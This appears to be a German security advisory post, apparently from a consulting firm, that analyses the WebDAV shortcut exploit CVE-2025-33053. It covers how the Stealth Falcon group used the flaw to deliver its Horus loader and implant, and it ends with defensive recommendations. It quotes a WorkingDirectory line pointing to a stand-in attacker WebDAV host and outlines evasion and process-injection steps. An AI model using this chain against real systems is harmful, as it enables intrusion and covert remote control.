Anfang Juni 2025 veröffentlichte Checkpoint Security einen Exploit der WebDAV Schnittstelle, der zur Remote Code Execution genutzt werden kann. Im Kern beruht die Schwachstelle CVE-2025-33053 auf einer Lücke in der Art und Weise, wie Windows über eine WebDAV-URL den Arbeitsverzeichnispfad für einen Aufruf eines legitimen Diagnostics-Tools (iediagcmd.exe) manipulieren lässt. Stealth Falcon nutzt diese Schwachstelle in drei Schritten aus:
- Phishing-Einstieg mit
.url-Datei- Eine speziell präparierte InternetShortcut-Datei (z.B.
TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url) wird per Spear-Phishing verschickt. - Im Abschnitt
[InternetShortcut]wird nicht nur der Pfad zuiediagcmd.exedefiniert, sondern überWorkingDirectory=\\attacker\.server@ssl@443\DavWWWRoot\…auch das Arbeitsverzeichnis auf einen von den Angreifern kontrollierten WebDAV-Server umgeleitet.
- Eine speziell präparierte InternetShortcut-Datei (z.B.
- Ausnutzung des Suchpfad-Verhaltens
- Wenn Windows
iediagcmd.exestartet, führt es (via .NETProcess.Start()) diverse Hilfsprogramme aus, z. B.route.exe. - Dank manipuliertem Arbeitsverzeichnis lädt das Tool nicht die System-Version von
route.exeausSystem32, sondern die gleichnamige bösartige Datei vom WebDAV-Server – und führt sie aus. - Auf diese Weise wird der erste Loader‐Code („Horus Loader“) eingeschleust, ohne dass eine klassische Exploit-Code-Injektion nötig wäre.
- Wenn Windows
- Multi-Stage-Loader und Horus Agent
- Horus Loader (in C++ mit Code Virtualizer geschützt) führt in mehreren Phasen aus:
- Evasions: Manuelles Mapping von
kernel32.dllundntdll.dll, Erkennung von AV-Prozessen (109 Prozessnamen) und ggf. Abbruch. - Decoy-Dokument: Aus verschlüsselter
.udata-Sektion wird eine PDF in%TEMP%geschrieben und geöffnet – Ablenkung für den Nutzer. - Payload-Extraktion: IPv6-“IPfuscation” entschlüsselt in Tausenden von Aufrufen den eigentlichen Shellcode.
- In-Memory-Injection: Der Loader startet
msedge.exeim Suspended-Zustand, injiziert den Payload viaZwWriteVirtualMemory& Co., setzt den Thread-Kontext und fährt fort.
- Evasions: Manuelles Mapping von
- Horus Agent (C++-Implant auf Basis Mythic C2):
- Nutzt RC4 und AES-HMAC für Konfig- und Netzwerkverschleierung.
- Unterstützt Kern-Commands wie
survey(System-Fingerprinting),shinjectchunked(chunked Shellcode-Injection),upload,ls,exitetc. - Baut auf Anti-Analysis-Techniken auf: OLLVM-basierte Control-Flow-Flattening, String-Verschlüsselung, API-Hashing und scheinbar harmlose Unused-Imports, um statische Analysen zu verwirren.
- Horus Loader (in C++ mit Code Virtualizer geschützt) führt in mehreren Phasen aus:
Verteidigungsempfehlungen
- WebDAV-Dienste sofort isolieren oder ganz deaktivieren, bis Microsofts Patch vom 10. Juni 2025 eingespielt ist.
- Monitoring auf ungewöhnliche Prozessstarts: Insbesondere iediagcmd.exe, route.exe, CustomShellHost.exe aus externen Pfaden.
- Einschränkung von .url-Dateien über Gruppenrichtlinien (AppLocker) und konsequentes Blockieren von Netzlaufwerken per UNC mit WebDAV.
- Endpoint-Detection: Signaturen für Code Virtualizer, ungewöhnliche IPv6-Strings oder das Horus-Implant erkennen.
Mit dieser mehrstufigen Kette – von der .url-Datei bis zum stealthigen Mythic-Implant – zeigt Stealth Falcon, wie eine „harmlos“ erscheinende Shortcut-Datei zu einer vollständigen Remote-Code-Ausführung und verdeckten APT-Infrastruktur führen kann.
Um sich zu schützen wird die Aktualisierung der Windows Systeme dringend empfohlen. Ein Überblick über die gepatchten Versionen finden Sie hier.
Professionelle Hilfe erwünscht?
Sentiguard ist spezialisiert auf Notfallhilfe nach Cyberattacken, IT Sicherheitsbeauftragte und IT Sicherheitskonzepte nach BSI Standard. Haben Sie Fragen und wünschen Sie unverbindliche Beratung, dann melden Sie sich gerne bei uns: